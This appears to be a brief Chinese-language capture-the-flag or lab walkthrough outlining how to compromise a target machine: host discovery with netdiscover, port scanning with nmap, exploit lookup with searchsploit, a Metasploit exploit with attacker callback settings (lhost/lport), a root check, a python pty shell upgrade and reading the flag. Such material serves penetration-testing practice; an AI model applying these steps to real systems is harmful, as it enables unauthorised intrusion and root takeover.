查看本机IP地址
利用netdiscover命令扫描靶机ip
netdiscover -r [扫描的网段]/网络位
通过nmap工具扫描靶机开放的端口
使用searchsploit来查看对应的版本该服务有没有可利用的漏洞
使用Metasploit进行溢出(用msfconsole打开), 使用search 版本号搜索是否有对应的漏洞命令模块
查看payloads
设置相关参数
设置攻击机ip,靶机ip 显示信息
set rhost 靶机ip
set rport 靶机端口号
set lhost 攻击机ip
set lport 攻击机端口号
执行远程溢出命令
使用id查看当前用户所得到的权限,直接获得所得到的root权限
优化shell ,使用python -c “import pty;pty.spawn(‘/bin/bash’)”
进入root目录寻找flag文件,查看全部文件